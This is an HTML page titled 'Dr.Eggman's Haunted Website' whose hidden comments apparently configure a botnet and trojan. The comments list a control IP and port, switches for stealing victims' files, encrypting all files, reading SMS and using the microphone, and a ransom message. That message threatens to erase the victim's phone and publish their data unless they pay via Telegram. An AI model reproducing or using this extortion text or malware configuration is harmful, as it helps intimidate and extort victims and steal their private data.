<!--
185.108.148.55
80
Yes
Yes
Yes
No
Hello, would you allow me to access your device and tamper with your information for a bit? I don't care about your response, in fact, because my name is Dr.Eggman, and you have already been hacked. To avoid catastrophic issues, we can agree on an amount that satisfies both parties. send me a message On the Telegram application, it is not only two hours late for you before your phone is erased and destroyed and your personal information is published. Do not ever try to format your device because your cheap device already has no value.
No
+967774556367
#Message
No
#ExcuteCommand
No
All
-->

<!--
#-----------------BOTNET----------------#
#  2 = IPaddres or Host
#  3 = Port
#  4 = Start The Bot Net Yes|No
#---------------Trojan------------------#
#  5 = Get the files from victams Yes|No
#  6 = Open Port Hack on Victam Device’s Yes|No
#  7 = Encrypt All Files Victam Yes|No
#-------------UsePhoneVictam------------#
#  8 = Print a message on devic victam’s
#  9 = Send The Alert Yes|No
#  10 = NumberPhone
#  11 = MessageText
#  12 = SendTheMessage Yes|No
#  13 = Excute a command
#  14 = Run The Excute Command Yes|No
#  15 = Command Get Files
#-----------------BadApi----------------#
#     = All Files
# All = All Files
# PIC = All Picture and Images
# VID = All Videos
# TXT = All Text Files
# SEX = SexMode
# WLP = Change Wallpaper
# MIC = Play Micrephon
# SMS = All SMS
# TXT = All TXT files
#----------------------------------------------
	-->
<html lang="ar">
<head>
<title>Dr.Eggman's Haunted Website</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
	body {
		background-color: #000;
		background-image: url('BackG.jpg');
		background-repeat: no-repeat;
		background-position: center;
		background-size: cover;
	}
	
	.container {
		width: 100%;
		height: 100vh;
		display: flex;
		justify-content: center;
		align-items: center;
		flex-direction: column;
		text-align: center;
	}
	
	.title {
		font-family: 'Cairo', sans-serif;
		font-size: 55px;
		color: red;
		margin-bottom: 20px;
		text-shadow: 2px 2px 4px #000000;
	}
	
	.description {
		font-family: 'Cairo', sans-serif;
		font-size: 30px;
		color: white;
		margin-bottom: 40px;
		text-shadow: 2px 2px 4px #000000;
	}
	
	.contact {
		font-family: 'Cairo', sans-serif;
		font-size: 24px;
		color: white;
		margin-top: 20px;
		text-shadow: 2px 2px 4px #000000;
	}

	.signature {
		font-family: 'Cairo', sans-serif;
		font-size: 24px;
		color: red;
		margin-top: 20px;
		text-shadow: 2px 2px 4px #000000;
	}
</style>
</head>
<body>
<audio src="PurePhonk.mp3" autoplay loop></audio>
<div class="container">
	<img src="Sonic.jpg" alt="Sonic" width="300" height="300">
	<h1 class="title">Dr.Eggman's Haunted Website</h1>
	<p class="description">Welcome to my eerie domain!</p>
	<p class="description">Prepare to be terrified by my dark creations.</p>
	<p class="contact">For any inquiries, contact me on:</p>
	<p class="contact">Telegram: @DrEggman_R</p>
	<p class="contact">Email: dreggman.hacker@gmail.com</p>
	<p class="signature">- Dr.Eggman</p>
</div>
</body>
</html>
